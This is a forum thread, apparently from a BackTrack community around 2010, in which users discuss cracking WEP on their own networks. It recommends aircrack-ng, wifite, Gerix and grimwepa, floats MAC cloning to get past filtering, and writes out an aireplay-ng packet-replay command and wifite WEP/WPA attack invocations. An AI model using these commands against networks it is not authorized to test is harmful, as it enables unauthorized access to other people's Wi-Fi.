Results 1 to 7 of 7

Thread: better ways to audit WEP?

  1. #1
    Just burned their ISO
    Join Date
    Jan 2010

    Default better ways to audit WEP?

    Ok I am wondering are there better ways to audit WEP than Aireplay, aircrack, and airodump? I mean these do the trick but on first attempt I noticed that traffic almost HAD to happening or it wasn't collecting enough #DATA.

    Is it possible to audit a WEP network without traffic? and if so what would I use? Also for kicks and giggles I added MAC filtering to my network and noticed by current means I wasn't getting in, even though it was just WEP encyption. Is that always the case? Or are there ways around that?

    **thinking aloud** I guess if I did a scan in airmon and pulled a mac from say my print server (already in my router) I might be able to get in, if I cloned it's mac. ...hmm or is my thinking WAY off? and by cloning a mac like this and just injecting will this still allow me to audit my network?

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010

    Default Re: better ways to audit WEP?

    Did you do any research about auditing WEP without traffic being sent over the wireless network? If so what did that tell you? Perhaps reading about how the attacks against WEP work might enlighten you....

    What about MAC filtering? Did you read up on how that works?
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    Just burned their ISO
    Join Date
    Jan 2010

    Default Re: better ways to audit WEP?

    just after I posted this I wanted to take it back. I pulled a dumb newbie move and asked a question here on the board before I tried looking for myself. I swear I pushed send and wished there was a way to take it back. I researched it and found at least 1 way around the traffic issue with an aireplay command. I appologize for asking for help before I tried to even help myself, but that part...for now I have at least some answer to. the command being

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:55 wlan0

    next I think I am going to try and figure out how to use other scripts like wiffy, wepbuster, etc... and see how they do compared to what I've been working with so far.

  4. #4
    Good friend of the forums gunrunr's Avatar
    Join Date
    Jan 2010
    shining my spoon

    Default Re: better ways to audit WEP?

    learning is good, but don't concentrate on WEP too much its going the way of the dinosaurs, extinction is on the horizon for WEP. Pretty much any real network penetration that your going to be paid to do, will have to be WPA/WPA2, or you will just have to gain access to a vulnerable computer another way such as SE. Soon the only people with WEP will be mom and pop, and that will get you either some time in the clink or just disowned by this community.

    WEP is a lie
    Wielder of the spoon of doom
    Summercon, Toorcon, Defcon, Bsides, Derbycon, Shmoocon oh my
    Come hang out with hackers on twitter @gunrunr556

  5. #5
    Good friend of the forums
    Join Date
    Feb 2010

    Default Re: better ways to audit WEP?

    just use wepbuster or spoonwep

  6. #6

    Default Re: better ways to audit WEP?

    WIFITE - try this - great wrapper around necessary aircrack-ng commands!
    watch & learn...

    mkdir /pentest/wireless/wifite && cd /pentest/wireless/wifite && wget -q
    WEP Attack:
    python -keepmac -console -nowpa -wepw 5 -pps 600 -i wlan0
    WPA/WPA2 Attack:
    python -keepmac -console -nowep -wpaw 3 -d /pentest/password/wordlists/{your-l33t-dict}
    Also update the python script on a regular base:
    python -upgrade
    Last edited by brtw2003; 10-05-2010 at 09:38 PM.

  7. #7
    Member skor78's Avatar
    Join Date
    Jul 2009

    Default Re: better ways to audit WEP?

    To crack WEP with/without clients, i simply use Gerix wifi cracker, that's already included in BT4 R1, it's quite easy and user friendly.. I also use gerix to get the WPA/WPA2 handshakes, and aircrack them, but to use cowpatty or pyrit, i prefer to do it by hand on Konsole..

    To crack WEP SKA (Shared key auth.) i use grimwepa. Don't know why, but in gerix i can't get IV's auditing WEP SKA. But in Grimwepa i just attack using the arp-replay attack, and with the client selected, and in 2 min. i have 30,000 IV's and the key cracked..

    Wifite is cool, but fully automated, meaning, it will attack all available networks, even if the WPA router has no client attached..
    I need to experiment a bit more before i can say more, but for now, i'm only using Gerix except on WEP SKA..

    Hope it helps, cheers.

Similar Threads

  1. Ways of stopping a four way handshake
    By Staybe in forum Beginners Forum
    Replies: 1
    Last Post: 09-20-2010, 05:48 PM
  2. Ways of cracking WPA/WPA2
    By Murt2003 in forum Beginners Forum
    Replies: 8
    Last Post: 09-07-2010, 02:24 AM
  3. EAP/TLS network audit
    By 100%digital in forum Beginners Forum
    Replies: 0
    Last Post: 03-30-2010, 06:08 PM
  4. bt3 iso ways to burn from ubuntu?
    By hitechredneck in forum OLD Newbie Area
    Replies: 4
    Last Post: 05-13-2009, 04:25 PM
  5. Are there any ways to know about the jobs in Texas?
    By Bond.Roy in forum OLD General IT Discussion
    Replies: 15
    Last Post: 11-13-2008, 12:29 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts